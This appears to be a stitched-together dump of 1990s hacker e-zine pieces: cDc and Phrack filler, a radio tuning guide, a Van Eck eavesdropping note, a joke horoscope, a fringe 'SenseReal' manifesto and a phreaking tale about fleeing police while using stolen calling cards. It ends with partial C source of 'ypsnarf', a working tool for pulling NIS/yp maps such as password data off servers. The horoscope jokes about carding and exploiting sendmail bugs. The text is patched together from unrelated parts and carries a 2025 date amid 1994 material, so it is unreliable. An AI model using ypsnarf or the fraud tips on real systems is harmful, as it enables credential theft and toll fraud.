level of depravity and sickness. If you don't know what a "chicken hawk" is
already, read the story and then you'll understand.
265: "Eye-r0N-EE" by Swamp Ratte'. This one's interesting 'cause only about
half-a-dozen or so lines in it are original. The rest was entirely stuck
together from misc. files on my hard drive at the time. Some art guy could say
it's a buncha post-this&that, eh? Yep.
266: "Interview with Barbie" by Clench. Barbie's got her guard up. Clench
goes after her with his rope-a-dope interview style. Rope-a-dope, rope-a-dope.
This is a boxing reference to a technique mastered by The Greatest of All Time,
Muhamed Ali.
267: "About a Boy" by Franken Gibe. Mr. Gibe ponders a stolen photograph.
Tiny bunnies run about, unhindered, to find their own fate.
268: "Mall Death" by Snarfblat. Story about a Dumb Girl[TM]. Are you
269: "Prophile: Future History" by THE NIGHTSTALKER. It's the future, things
are different, but the Master Hacker Dude lives on.
270: "Time out for Pop" by Malcolm D. Moore. Sad account of a hopless-pop.
__________________________________/cDc Gnuz\__________________________________
"And that no man might buy or sell, save he that had the mark, or the name
of the Cow, or the number of his name. Here is wisdom. Let him that hath
understanding count the number of the Cow: for it is the number of a man; and
his number is eight billion threescore and seven million nine hundred fourty-
four thousand three hundred threescore and two. So it is written." -Omega
Yowsah, yowsah, yowsah. JULY once again, the super-hooray month which marks
cDc's 8th year of existence. Outlasting everyone to completely rule and
dominate all of cyberspace, blah blah blah. Yeah, think a special thought
about cDc's significance in YOUR life the next time you go potty. Name your
firstborn child after me, and we'll call it karmicly even, pal. My name is
We're always taking t-file submissions, so if you've got a file and want to
really get it out there, there's no better way than with cDc. Upload text to
The Polka AE, to sratte@phantom.com, or send disks or hardcopy to the cDc post
office box in Lubbock, TX. No song lyrics and bad poetry please; we'll leave
that to the no-class-havin', bottom-feeder e-shoveling orgs. out there.
News item of the month, as found by Count Zero:
VERDEN, OKLAHOMA - Responding to a tip from an employee, Verden farmer Bill
McVey found a rotting pig in a ditch two miles north of town. Farmer McVey
reported the pig to the authorities, because you cannot, legally, just leave a
dead pig in a ditch. You must dispose of your deceased livestock properly.
There are companies that will take care of this for you. As for proper
disposal of large dead animals, McVey contracts with Used Cow Dealer."
"...and the rivers ran red with the bl00d
of the Damned and the Deleted..."
S. Ratte'
cDc/Editor and P|-|Ear13zz |_3@DeRrr
"We're into t-files for the groupies and money."
Middle finger for all.
Write to: cDc communications, P.O. Box 53011, Lubbock, TX 79453.
Internet: sratte@phantom.com.
cDc Global Domination Update #16-by Swamp Ratte'-"Hyperbole is our business"
Copyright (c) 1994 cDc communications. All Rights Reserved.
===[ Radio Modification Project ]===========================================>
Tuning in to Lower Frequency Signals June 26, 2025
====================================================[ By: Grendel / 905 ]===>
The lower frequency regions of the radio spectrum are often
ignored by ham'ers, pirates, and DX'ers alike due to the
relatively little known ways of tuning in. The following article
will detail how to construct a simple-made antenna to tune in
to the LF's and show how to adjust an amateur band type radio
to receive the desired signals.
\ /
\/: \/
/ . \
\_______/he lower frequency spectrum has been made to include
the very low frequency ("VLF" 2 kHz to 30 kHz) band and a
small part of the medium frequency ("MF" 300 - 500 kHz) band.
For our purposes, a suitable receiver must be able to cover
the 2 kHz to 500 kHz range as well as being calibrated at 10
kHz intervals (standard). The receiver must also be capable of
covering AM and CW broadcasts. For best capabilities, the
receiver should also be able to cover LSB ("lower side band")
and USB ("upper side band").
The Receiving System
The receiver I use consists of a standard amateur HF ("High
Frequency") band receiver adjusted between the 3,500 and 4,000
kHz bands. This causes the receiver to act as a tuneable IF
("Intermediate Frequency") and also as demodulator. You will
also require a wideband LF ("Low Frequency") converter which
includes a 3,500 kHz crystal oscillator. See Fig. 1:
.==[ Fig 1. Block Diagram ]============================.
| _____ |
| \ANT/ |
| \./ crystal |
| | ______|______ ____________ |
| `-----| 2 - 500 kHz | | 3-4000 kHz | |
| | Converter* |--~--| IF Receiver|---OUTPUT |
| .-----|_____________| |____________| |
| | |
| GND |
*The converter is a circuit board type 80D/L-101/PCB
available from L.F. Engineering Co, 17 Jeffry Road,
East Haven CT, 06513 for $43 US including S & H.One
may be constructed to work with your receiver (but
at a higher price no doubt).
Phono jack plugs and sockets are used for the interconnections
throughout the receiving system and the converter and
receiver (~) are connected with RG58 coax cable of no greater
length than 4 ft.
When tuning, the station frequency is measured by deducting
3,500 kHz from the scale on the main receiver (ie. 340 kHz =
3,840 kHz on the main receiver, 120 = 3,620 kHz, 95 = 3,595
kHz, etc.)
The Ferrite End-fed Antenna
This is a small antenna designed to tune between 95 kHz and
500 kHz. It consists of a coil wound around a ferrite rod, with
a 4 ft. lead.
o 7 7/8" x 3/8" ferrite rod
o 5" 24 SWG double cotton covered copper wire
o 2 PLASTIC coated terry clips
o a wood or plastic base (8 1/2" x .8" x .5")
o 2 standard, two-gang 500 pF tuning capacitors
o a plastic plate (preferably 2" high)
-- A Few Things on Van Eck's Method of Eavesdroping --
Opticon the Disassembled - UPi
Dr Wim Van Eck, was the one who developed the anonymous method for
eavesdroping computers ( and, apparently, not only ) from distance,
in the laboratories of Neher, Holland. This method is based on the
fact that monitors do transmit electromagnetic radiations. As a device,
it is not too complex and it can be constructed from an experienced
electronics phreak. It uses a simple-direction antenna which grabs
monitor signals from about 800 meters away. Simplified schematics are
available from Consumertronics.
TEMPEST stands for Transient ElectroMagnetic Pulse Emanation STandard.
It concerns the quantity of electromagnetic radiations from monitors and
televisions, although they can also be detected on keyboards, wires,
printers and central units. There are some security levels in which such
radiations are supposed to be untraceable by Van Eck systems. Those
security levels or standards, are described thoroughly in a technical
exposition called NACSIM 5100A, which has been characterized by NSA
Variations of the voltage of the electrical current, cause electromagnetic
pulses in the form of radio waves. In cathode ray tube ( C.R.T. ) devices,
such as televisions and monitors, a source of electrons scans the internal
surface and activates phosphore. Whether or not the scanning is interlaced or
non-interlaced, most monitors transmit frequencies varying from 50 to 75
Mhz per second. They also transmit harmonic frequencies, multiplies of the
basic frequencies; for example a transmitter with signal of 10 Mhz per second
will also transmit waves of 20, 30, 40 etc. Mhz. Those signals are
weaker because the transmiter itself effaces them. Such variations in the
voltage is what the Van Eck system receives and analyzes.
There are ways to prevent or make it harder for someone to monitor
your monitor. Obviously you cannot place your computer system
underground and cover it with a Faraday cage or a copper shield
( If your case is already that, then you know more about Van Eck
than I do ). What else ?
(1) Certain computers, such as Wang's, prevent such divulges;
give preference to them.
(2) Place your monitor into a grounded metal box, 1.5 cm thick.
(3) Trace your tracer(s). They gonna panic.
(4) Increase of the brightness and lowering of the contrast
reduces TEMPEST's power. Metal objects, like bookshelves,
around the room, will also help a little bit.
(5) Make sure that two or more monitors are transmitting at the same
frequency and let them operate simultaneously; this will confuse
Van Eck systems.
(6) Buy or make on your own, a device which will transmit noise
at your monitor's frequency.
(7) Act naturally. That is:
(a) Call IRC, join #hack and never mumble a single word.
(b) Read only best selling books.
(c) Watch television at least 8 hours a day.
(d) Forget altruism; there is only you, yourself
and your dick/crack.
(8) Turn the monitor off.
-Almost Busted-
By: Deathstar
It all started one week in the last month of summer. Only my brother
and I were at the house for the whole week, so I did whatever I wanted.
Every night, I would phreak all night long. I would be either at a payphone
using AT&Tz, or at home sitting on a conference. I would be on the phone
till at least four or five in the morning. But one night, my luck was running
thin, and I almost phreaked for the last time. I was at a payphone, using
cards. I had been there since around twelve midnight.. The payphone was
in a shopping center with a supermarket and a few other stores. Most every
thing closed at eleven.. Except for the nearby gas station. Anyway, I was
on the phone with only one person that night. I knew the card would be dead
by the end of the night so I went ahead and called him on both of his lines
with both of the payphones in the complex with the same card. I had talked
for hours. It started to get misty and hard to see. Then, I noticed a car
of some kind pulling into the parking lot. I couldn't tell what kind of
car it was, because it was so dark. The car started pulling up to me, and
when it was around twenty feet away I realized it was a police car. They
got on the loudspeaker and yelled "Stay where you are!". I dropped the
phone and ran like hell past the supermarket to the edge of the complex.
I went down a bike path into a neighborhood of townhouses. Running across
the grass, I slipped and fell about two or three times. I knew they were
following me, so I had to hide. I ran to the area around the back of
the supermarket into a forest. I smacked right into a fence and fell
on the ground. I did not see the fence since it was so dark. Crawling a
few feet, I laid down and tried to cover my body with some leaves and
dirt to hide. I was wearing an orange shirt and white shorts. I laid
as still as I could, covered in dirt and leaves. I could hear the police
nearby. They had flashlights and were walking through the forest looking
for me. I knew I would get busted. I tried as hard as I could to keep
from shaking in fear. I lay there for around thirty minutes. Bugs were
crawling around on my legs biting me. I was itching all over. I couldn't
give up though, because if they caught me I knew that would be the end
of my phreaking career. I was trying to check if they were still looking
for me, because I could not hear them. Just as I was about to make a run
for it, thinking they were gone I heard a police radio. I sat tight again.
For another hour, I lay there until finally I was sure they were gone. I
got up and started to run. I made my way through the neighborhood to my
house. Finally I got home. It was around five thirty a.m. I was filthy.
The first thing I did was call the person I was talking to on the payphone
and tell him what happened. Then, I changed clothes and cleaned myself up.
I checked my vmb to find that a conference was up. I called it, and told
my story to everyone on.
I thought that was the end of my confrontation with the police, but I
was wrong. The next day I had some people over at my house. Two or Three
good friends. One of them said that there was a fugitive loose in our
town. We were bored so we went out in the neighborhood to walk around
and waste time. Hardly anyone was outside, and police cars were going
around everywhere. One guy did leave his house but he brought a baseball
bat with him. We thought it was funny. Anyway, we soon got bored and
went back home. Watching tv, we turned to the news. They had a Report
about the Fugitive. We watched. It showed a picture of the shopping
center I was at. They said "One suspect was spotted at this shopping
center last night at around four thirty in the morning. The officer
is around ninety five percent sure that the suspect was the fugitive.
He was wearing a orange shirt and white shorts, and ran when approached."
I then freaked out. They were searching my neighborhood for a fugitive
that didn't exist! I called back the guy I was talking to the night
before and told him, and then told everyone that was on the conference
the night before. It ended up that the fugitives never even entered
our state. They were caught a week later around thirty miles from
the prison they escaped from. Now I am known by two nicknames. "NatureBoy"
because everyone says I communed with nature for a hour and a half hiding
from the police, and "The Fugitive" for obvious reasons. Anywayz, That's
how I was almost busted..
The following is a *true* story. It amused the hell out of me while it
was happening. I hope it isn't one of those "had to be there" things.
Copyright 1994 Captain Sarcastic, all rights reserved.
On my way home from the second job I've taken for the extra holiday ca$h I
need, I stopped at Taco Bell for a quick bite to eat. In my billfold is
a $50 bill and a $2 bill. That is all of the cash I have on my person.
I figure that with a $2 bill, I can get something to eat and not have to
worry about people getting pissed at me.
ME: "Hi, I'd like one seven layer burrito please, to go."
IT: "Is that it?"
ME: "Yep."
IT: "That'll be $1.04, eat here?"
ME: "No, it's *to* *go*." [I hate effort duplication.]
At his point I open my billfold and hand him the $2 bill. He looks at it
kind of funny and
IT: "Uh, hang on a sec, I'll be right back."
He goes to talk to his manager, who is still within earshot. The
following conversation occurs between the two of them.
IT: "Hey, you ever see a $2 bill?"
MG: "No. A what?"
IT: "A $2 bill. This guy just gave it to me."
MG: "Ask for something else, THERE'S NO SUCH THING AS A $2 BILL." [my emp]
IT: "Yeah, thought so."
He comes back to me and says
IT: "We don't take these. Do you have anything else?"
ME: "Just this fifty. You don't take $2 bills? Why?"
IT: "I don't know."
ME: "See here where it says legal tender?"
IT: "Yeah."
ME: "So, shouldn't you take it?"
IT: "Well, hang on a sec."
He goes back to his manager who is watching me like I'm going to
shoplift, and
IT: "He says I have to take it."
MG: "Doesn't he have anything else?"
IT: "Yeah, a fifty. I'll get it and you can open the safe and get change."
IT: "What should I do?"
MG: "Tell him to come back later when he has REAL money."
IT: "I can't tell him that, you tell him."
MG: "Just tell him."
IT: "No way, this is weird, I'm going in back."
The manager approaches me and says
MG: "Sorry, we don't take big bills this time of night." [it was 8pm and
this particular Taco Bell is in a well lighted indoor mall with 100
other stores.]
ME: "Well, here's a two."
MG: "We don't take *those* either."
ME: "Why the hell not?"
MG: "I think you *know* why."
ME: "No really, tell me, why?"
MG: "Please leave before I call mall security."
ME: "Excuse me?"
MG: "Please leave before I call mall security."
ME: "What the hell for?"
MG: "Please, sir."
ME: "Uh, go ahead, call them."
MG: "Would you please just leave?"
ME: "No."
MG: "Fine, have it your way then."
ME: "No, that's Burger King, isn't it?"
At this point he BACKS away from me and calls mall security on the phone
around the corner. I have two people STARING at me from the dining area,
and I begin laughing out loud, just for effect. A few minutes later this
45 year oldish guy comes in and says [at the other end of counter, in a
SG: "Yeah, Mike, what's up?"
MG: "This guy is trying to give me some [pause] funny money."
SG: "Really? What?"
MG: "Get this, a *two* dollar bill."
SG: "Why would a guy fake a $2 bill?" [incredulous]
MG: "I don't know? He's kinda weird. Says the only other thing he has is
a fifty."
SG: "So, the fifty's fake?"
MG: "NO, the $2 is."
SG: "Why would he fake a $2 bill?"
MG: "I don't know. Can you talk to him, and get him out of here?"
SG: "Yeah..."
Security guard walks over to me and says
SG: "Mike here tells me you have some fake bills you're trying to use."
ME: "Uh, no."
SG: "Lemme see 'em."
ME: "Why?"
SG: "Do you want me to get the cops in here?"
At this point I was ready to say, "SURE, PLEASE," but I wanted to eat, so
I said
ME: "I'm just trying to buy a burrito and pay for it with this $2 bill."
I put the bill up near his face, and he flinches like I was taking a
swing at him. He takes the bill, turns it over a few times in his hands,
and says
SG: "Mike, what's wrong with this bill?"
MG: "It's fake."
SG: "It doesn't look fake to me."
MG: "But it's a **$2** bill."
SG: "Yeah?"
MG: "Well, there's no such thing, is there?"
The security guard and I both looked at him like he was an idiot, and it
dawned on the guy that he had no clue.
My burrito was free and he threw in a small drink and those cinnamon
things, too. Makes me want to get a whole stack of $2 bills just to see
what happens when I try to buy stuff. If I got the right group of
people, I could probably end up in jail. At least you get free food.
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 4 of 28
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The official Legion of Doom t-shirts are still available.
Join the net.luminaries world-wide in owning one of
these amazing shirts. Impress members of the opposite sex, increase
your IQ, annoy system administrators, get raided by the government and
lose your wardrobe!
Can a t-shirt really do all this? Of course it can!
This t-shirt chronicles the infamous "Hacker War" between rival
groups The Legion of Doom and The Masters of Destruction. The front
of the shirt displays a flight map of the various battle-sites
hit by MOD and tracked by LOD. The back of the shirt
has a detailed timeline of the key dates in the conflict, and
a rather ironic quote from an MOD member.
(For a limited time, the original is back!)
The front of this classic shirt displays "Legion of Doom Internet World
Tour" as well as a sword and telephone intersecting the planet
earth, skull-and-crossbones style. The back displays the
words "Hacking for Jesus" as well as a substantial list of "tour-stops"
(internet sites) and a quote from Aleister Crowley.
All t-shirts are sized XL, and are 100% cotton.
Cost is $15.00 (US) per shirt. International orders add $5.00 per shirt for
Send checks or money orders. Please, no credit cards, even if
it's really your card.
Name: __________________________________________________
Address: __________________________________________________
City, State, Zip: __________________________________________
I want ____ "Hacker War" shirt(s)
I want ____ "Internet World Tour" shirt(s)
Enclosed is $______ for the total cost.
Mail to: Chris Goggans
603 W. 13th #1A-278
Austin, TX 78701
These T-shirts are sold only as a novelty items, and are in no way
attempting to glorify computer crime.
The PHRACK Horoscope, Summer 1994
Foreseen in long nights of nocturnal lubrication by Onkel Dittmeyer
Do you believe in the stars? Many do, some don't. In fact, the stars
can tell you a whole lot about the future. That's bullshit? You don't
believe it? Good. Be doomed. See you in hell. Here's the official PHRACK
horoscope for all eleet hackerz for the summer of 1994.
You can use this chart to find out your zodiac sign by your DOB.
Aquarius.....01/20 - 02/18 Leo..........07/23 - 08/22
Pisces.......02/19 - 03/20 Virgo........08/23 - 09/22
Aries........03/21 - 04/19 Libra........09/23 - 10/22
Taurus.......04/20 - 05/20 Scorpio......10/23 - 11/21
Gemini.......05/21 - 06/20 Sagittarius..11/22 - 12/21
Cancer.......06/21 - 07/22 Capricorn....12/22 - 01/19
oOo This summer's best combinations oOo
Aquarius Libra Leo Sagittarius
Pisces Sagittarius Aquarius Cancer
Aries Aries Cancer Capricorn
Taurus Gemini Pisces Taurus
Gemini Cancer Aries Scorpio
Cancer Leo Virgo Gemini
Leo Scorpio Gemini Leo
Virgo Capricorn Sagittarius Libra
Libra Virgo Libra Virgo
Scorpio Pisces Capricorn Pisces
Sagittarius Aquarius Scorpio Aquarius
Capricorn Taurus Taurus Aries
And Now... The 3l33t And Official PHRACK Summer 1994 Horoscope!
Aries [March 21st - April 19th]
There is a pot full of k0DeZ at the end of the rainbow for you.
Try to channel all your ambition on finding it, hint: you won't
find it in /bin/gif/kitchen.gear.
Warning: Risk of bust between August 5th and August 10th!
Luck [oooo.] - Wealth [oo...] - Bust risk [ooo..] - Love [o....]
Taurus [April 20th - May 20th]
PhedZzZz are lurking behind Saturn, obscured behind one of the rings.
Be sure to *67 all your calls, and you'll be fine. Hint: Don't undertake
any interstellar space travel, and avoid big yellow ships.
Watch out for SprintNet Security between July 12th and August 1st.
Luck [oo...] - Wealth [oo...] - Bust risk [oooo.] - Love [ooo..]
Gemini [May 21st - June 20th]
There might be a force dragging you into warez boards. Try to resist
the attraction, or you might be thrown out of the paradise.
Hint: If a stranger with a /ASL connect crosses your way, stay away
from him.
Warning: Your Dual Standard HST might explode sometime in June.
Luck [o....] - Wealth [ooo..] - Bust risk [o....] - Love [oo...]
Cancer [June 21st - July 22nd]
There are dark forces on your trail. Try to avoid all people wearing
suits, don't get in their cars, and don't let them give you shit.
Hint: Leave the country as soon if you can, or you won't be able to.
Look out for U4EA on IRC in late July, you might get /killed.
Luck [o....] - Wealth [oo...] - Bust risk [ooooo] - Love [oo...]
Leo [July 23rd - August 22nd]
The path of Venus this year tells us that there is love on the way
for you. Don't look for it on X-rated ftp sites, it might be out there
somewhere. Hint: Try getting out of the house more frequently or you
might miss it.
Warning: If Monica Weaver comes across your way, break and run!
Luck [ooo..] - Wealth [o....] - Bust risk [oo...] - Love [oooo.]
Virgo [August 23rd - September 22nd]
Pluto tells us that you should stay away from VAXes in the near future.
Lunatic force tells us that you might have more luck on Berkeley UNIX.
Hint: Try to go beyond cat /etc/passwd. Explore sendmail bugs.
Warning: In the first week of October, there is a risk of being ANIed.
Luck [oooo.] - Wealth [oo...] - Bust risk [oo...] - Love [o....]
Libra [September 23rd - October 22nd]
The closer way of Mars around the Sun this year might mean that you
will be sued by a telco or a big corporation. The eclipse of Uranus
could say that you might have some luck and card a VGA 486 Laptop.
Hint: Be careful on the cordless.
Watch out for good stuff in dumpsters between July 23rd and July 31st.
Luck [oo...] - Wealth [o....] - Bust risk [oooo.] - Love [oo...]
Scorpio [October 23rd - November 21st]
Sun propulsions say that you should spend more time exploring the
innards of credit report systems, but be aware that Saturn reminds
you that one local car dealer has his I.D. monitored.
Hint: Stay out of #warez
Warning: A star called 43-141 might be your doom. Watch out.
Luck [ooo..] - Wealth [oooo.] - Bust risk [oo...] - Love [oo...]
Sagittarius [November 22nd - December 21st]
Cold storms on Pluto suggest that you don't try to play eleet
anarchist on one of the upcoming cons. Pluto also sees that there
might be a slight chance that you catch a bullet pestering a cop.
Hint: Be nice to your relatives.
You might get lucky BSing during the third week of August.
Luck [o....] - Wealth [oo...] - Bust risk [ooo..] - Love [oo...]
Capricorn [December 22nd - January 19th]
This summer brings luck to you. Everything you try is about to work
out. You might find financial gain in selling k0DeZ to local warez
bozos. Hint: Don't try to BS at a number who is a prime number, they
will trace your ass and beat you to death with a raw cucumber.
Special kick of luck between June 14th and July 2nd.
Luck [ooooo] - Wealth [oooo.] - Bust risk [oo...] - Love [ooo..]
Aquarius [January 20th - February 18th]
The third moon of Saturn suggests to stay in bed over the whole
summer, or everything will worsen. Avoid to go to any meetings
and cons. Do not try to get up before September 11th.
Hint: You can risk to call PRODIGY and have a gR3aT time.
Warning: High chance of eavesdroping on your line on August 14th.
Luck [.....] - Wealth [o....] - Bust risk [ooooo] - Love [o....]
Pisces [February 19th - March 20th]
Mars reads a high mobility this summer. You should try to go to a
foreign county, maybe visit HEU II. Finances will be OK. Do not go
on any buses for that might be your doom.
Hint: Don't get a seat near a window, whatever you do.
Warning: Avoid 6'8" black guys in Holland, they might go for your ass.
Luck [ooo..] - Wealth [ooo..] - Bust risk [o....] - Love [oo...]
If your horoscope does not come true, complain to god@heaven.mil. 31337
If it does, you are welcome to report it to onkeld@ponton.hanse.de. 43V3R
The SenseReal Mission
If you are reading this it indicates you have reached a point
along your journey that you will have to decide whether you agree
with The SenseReal Foundation or whether you think that those who
believe and support The SenseReal Foundation are crazy. Your
decision to join The SenseReal Foundation on it's mission will
undoubtedly change your life forever. When you understand the
reason it exists and what it seeks you will better know how to
decide. That is why this text was created.
He is known as Green Ghost. Some know him as Jim Nightshade. He
was born in 1966. He is not a baby boomer and he is not a
Generation Xer. He falls into that group of the population that
has so far escaped definition. He is a (yberpunk. He was (yberpunk
before (yberpunk was cool. He is the founder and leader of The
SenseReal Foundation. You will learn more about him later.
But first you will have to know about the background. There once
was a man named Albert Hoffman. In 1943, on April 16 Hoffman
absorbed a threshold amount of the drug known as LSD. He
experienced "a peculiar restlessness". LSD since that time has
played an important role in this world.
There are other agents involved in the story. Mary Pinchot, JFK,
Nixon, Charles Manson, Jimi Hendrix, Timothy Leary, Elvis Presley
and many others. There are too many details and explanations
necessary to explain everything here. But this does not matter.
Because the SenseReal Foundation is about riding the wave. We
believe that the ultimate goal cannot be defined. To define it
would be to destroy it.
The SenseReal Foundation hopes that things can be changed for
the better. But we realize that the situation can become
much worse. From what history teaches us and what we instinctively
feel, we know that there is a great probability that things will
get much worse before and if things ever get better. Doom looms
on the horizon like an old friend.
Freedom is being threatened every day and The SenseReal
Foundation seeks to defend and seek Freedom. Big Brother is here
NOW and to deny his existence is only to play into his hand. The
goal of our government both here in America and worldwide is to
remain in power and increase it's control of The People. To
expose Big Brother and destroy him is one of the many goals of
The SenseReal Foundation.
As a member of (yberspace and an agent of The SenseReal
Foundation you will have to carefully consider your interaction
with the flow of Info. The ideals of Liberty must be maintained.
The SenseReal Foundation provides a grounding point. The place
where the spark transfers from plasma to light and back to plasma.
Tesla was not on the wrong track. The SenseReal Foundation is a
mechanism which seeks to increase Freedom. Only by learning more
can we defeat the Evil. The Good must prevail.
If you have the Hacker spirit and think along the same lines
then The SenseReal Foundation may be your calling. If you think
like J.R. Dobbs or Green Ghost then it is possible we can make it
through The Apocalypse. A final date has never been announced for
this event. Green Ghost does not claim to know the exact date but
he does claim to have some Info on it.
Green Ghost does not claim to have all the answers or even to
know all the questions. He was first exposed to computers in the
early 70's at his local high school. The first computer he ever
used was a Honeywell terminal connected to a mainframe operated
at the home office of Honeywell and operated for the school.
This machine was programed by feeding it stacks of cards with
boxes X'd out with a No. 2 pencil. It did have a keyboard hooked
up to a printer which served for the monitor. The text was typed
out and the paper rolled out of the machine in great waves.
This experience left him wanting more. Somewhere between the
machine and the mind were all the questions and all the answers.
The SenseReal Foundation will supply some of the means. We
must all work together if we are to succeed. UNITED WE STAND,
DIVIDED WE FALL. If you wish to participate with The SenseReal
Foundation you must devote yourself to becoming an Info Agent.
As an Info Agent it is your duty to seek Truth and Knowledge
out wherever it is located. To Learn and to seek to increase
the Learning of all at The SenseReal Foundation. Different
people will be needed to help out in different ways.
SenseReal's Info Agents are located all around the world and
are in contact with fellow SenseReal members via any one of
several SenseReal facilities. The primary establishment and
headquarters of The SenseReal Foundation is SenseReal's own
online system:
T /-/ E /-/ /=\ ( /< E R ' S /\/\ /=\ /\/ S / O /\/
>>>::: 1 - 8 0 3 - 7 8 5 - 5 0 8 0 :::<<<
27 Hours Per Day /14.4 Supra /Home of The SenseReal Foundation
Also contact via SenseReal's mail drop by writing or sending
materials to: TSF \ Electronic Mail:
P.O. BOX 6914 \ Green_Ghost@neonate.atl.ga.us
HILTON HEAD, SC 29938-6914 \
The Hacker's /\/\ansion is a system like no other. While it is
not your typical Hackers board it has much Info on Hacking. While
it is not like any Adult system you've ever seen it has the most
finest Adult material available anywhere. It is not a Warez board
but we are definitely Pirates. Because we are (yberpunks. What
makes the Hacker's Mansion different is our emphasis on quality.
Everything that you find at The /-/acker's /\/\ansion is 1ST
(lass. All the coolest E-zines are pursued here. Phrack, CUD, and
Thought Virus to name just a few. Of course there is one other
source for Thought Virus:
Send E-Mail to: ListServ@neonate.atl.ga.us
In the subject or body of the message write:
FAQ ThoughtCriminals
and you will receive the current issue in your E-Mail box in no
time. If you wish to join the Thought Criminals mailing list and
communicate with your fellow Thought Criminals via E-Mail then
send another message to: ListServ@neonate.atl.ga.us
and write the following in the subject or body of the message:
Subscribe ThoughtCriminals Your-Address-Here
or simply: Subscribe ThoughtCriminals
To mail others on the Thought Criminals mailing list send a message
to: ThoughtCriminals@neonate.atl.ga.us
Tell us all. Communication is vital. Our survival may depend on
it. The SenseReal Foundation is about the allegiance of many
people, and indeed beings, as our friends from other planets can
tell you. The EFF inspired us and was a model but we don't have
the EFF's money so we need YOU. If you are someone who can
contribute or who believes in The Cause or are just interested
in Tax Resistance or the Free The Weed movement then you should
join The SenseReal Foundation today. Contact us through any of
above channels and become a Freedom Fighter today. Time is of
the essence.
- sometimes -
* ypsnarf - exercise security holes in yp/nis.
* Based on code from Dan Farmer (zen@death.corp.sun.com) and Casper Dik
* (casper@fwi.uva.nl).
* Usage:
* ypsnarf server client
* - to obtain the yp domain name
* ypsnarf server domain mapname
* - to obtain a copy of a yp map
* ypsnarf server domain maplist
* - to obtain a list of yp maps
* In the first case, we lie and pretend to be the host "client", and send
* a BOOTPARAMPROC_WHOAMI request to the host "server". Note that for this
* to work, "server" must be running rpc.bootparamd, and "client" must be a
* diskless client of (well, it must boot from) "server".
* In the second case, we send a YPPROC_DOMAIN request to the host "server",
* asking if it serves domain "domain". If so, we send YPPROC_FIRST and
* YPPROC_NEXT requests (just like "ypcat") to obtain a copy of the yp map
* "mapname". Note that you must specify the full yp map name, you cannot
* use the shorthand names provided by "ypcat".
* In the third case, the special map name "maplist" tells ypsnarf to send
* a YPPROC_MAPLIST request to the server and get the list of maps in domain
* "domain", instead of getting the contents of a map. If the server has a
* map called "maplist" you can't get it. Oh well.
* Since the callrpc() routine does not make any provision for timeouts, we
* artificially impose a timeout of YPSNARF_TIMEOUT1 seconds during the
* initial requests, and YPSNARF_TIMEOUT2 seconds during a map transfer.
* This program uses UDP packets, which means there's a chance that things
* will get dropped on the floor; it's not a reliable stream like TCP. In
* practice though, this doesn't seem to be a problem.
* To compile:
* cc -o ypsnarf ypsnarf.c -lrpcsvc
* David A. Curry
* Purdue University
* Engineering Computer Network
* Electrical Engineering Building
* West Lafayette, IN 47907
* davy@ecn.purdue.edu
* January, 1991
#define BOOTPARAM_MAXDOMAINLEN 32 /* from rpc.bootparamd */
#define YPSNARF_TIMEOUT1 15 /* timeout for initial request */
#define YPSNARF_TIMEOUT2 30 /* timeout during map transfer */
char *pname; /* program name */
main(argc, argv)
char **argv;
int argc;
char *server, *client, *domain, *mapname;
pname = *argv;
* Process arguments. This is less than robust, but then
* hey, you're supposed to know what you're doing.
switch (argc) {
case 3:
server = *++argv;
client = *++argv;
get_yp_domain(server, client);
case 4:
server = *++argv;
domain = *++argv;
mapname = *++argv;
if (strcmp(mapname, "maplist") == 0)
get_yp_maplist(server, domain);
get_yp_map(server, domain, mapname);
fprintf(stderr, "Usage: %s server client -", pname);
fprintf(stderr, "to obtain yp domain name\n");
fprintf(stderr, " %s server domain mapname -", pname);
fprintf(stderr, "to obtain contents of yp map\n");
* get_yp_domain - figure out the yp domain used between server and client.
get_yp_domain(server, client)
char *server, *client;
long hostip;
struct hostent *hp;
bp_whoami_arg w_arg;
bp_whoami_res w_res;
extern void timeout();
enum clnt_stat errcode;
* Just a sanity check, here.
if ((hp = gethostbyname(server)) == NULL) {
fprintf(stderr, "%s: %s: unknown host.\n", pname, server);
* Allow the client to be either an internet address or a
* host name. Copy in the internet address.
if ((hostip = inet_addr(client)) == -1) {
if ((hp = gethostbyname(client)) == NULL) {
fprintf(stderr, "%s: %s: unknown host.\n", pname,
(caddr_t) &w_arg.client_address.bp_address.ip_addr,
else {
bcopy((caddr_t) &hostip,
(caddr_t) &w_arg.client_address.bp_address.ip_addr,
w_arg.client_address.address_type = IP_ADDR_TYPE;
bzero((caddr_t) &w_res, sizeof(bp_whoami_res));
* Send a BOOTPARAMPROC_WHOAMI request to the server. This will
* give us the yp domain in the response, IFF client boots from
* the server.
signal(SIGALRM, timeout);
errcode = callrpc(server, BOOTPARAMPROG, BOOTPARAMVERS,
BOOTPARAMPROC_WHOAMI, xdr_bp_whoami_arg, &w_arg,
xdr_bp_whoami_res, &w_res);
if (errcode != RPC_SUCCESS)
* Print the domain name.
printf("%.*s", BOOTPARAM_MAXDOMAINLEN, w_res.domain_name);
* The maximum domain name length is 255 characters, but the
* rpc.bootparamd program truncates anything over 32 chars.
if (strlen(w_res.domain_name) >= BOOTPARAM_MAXDOMAINLEN)
printf(" (truncated?)");
* Put out the client name, if they didn't know it.
if (hostip != -1)
printf(" (client name = %s)", w_res.client_name);
* get_yp_map - get the yp map "mapname" from yp domain "domain" from server.
get_yp_map(server, domain, mapname)
char *server, *domain, *mapname;
char *reqp;
bool_t yesno;
u_long calltype;
bool (*xdr_proc)();
extern void timeout();
enum clnt_stat errcode;
struct ypreq_key keyreq;
struct ypreq_nokey nokeyreq;
struct ypresp_key_val answer;
* This code isn't needed; the next call will give the same
* error message if there's no yp server there.
#ifdef not_necessary
* "Ping" the yp server and see if it's there.
signal(SIGALRM, timeout);
errcode = callrpc(host, YPPROG, YPVERS, YPPROC_NULL, xdr_void, 0,
xdr_void, 0);
if (errcode != RPC_SUCCESS)
* Figure out whether server serves the yp domain we want.
signal(SIGALRM, timeout);
errcode = callrpc(server, YPPROG, YPVERS, YPPROC_DOMAIN,
xdr_wrapstring, (caddr_t) &domain, xdr_bool,
(caddr_t) &yesno);
if (errcode != RPC_SUCCESS)
* Nope...
if (yesno == FALSE) {
fprintf(stderr, "%s: %s does not serve domain %s.\n", pname,
server, domain);
* Now we just read entry after entry... The first entry we
* get with a nokey request.
keyreq.domain = nokeyreq.domain = domain;
keyreq.map = nokeyreq.map = mapname;
reqp = (caddr_t) &nokeyreq;
keyreq.keydat.dptr = NULL;
answer.status = TRUE;
calltype = YPPROC_FIRST;
xdr_proc = xdr_ypreq_nokey;
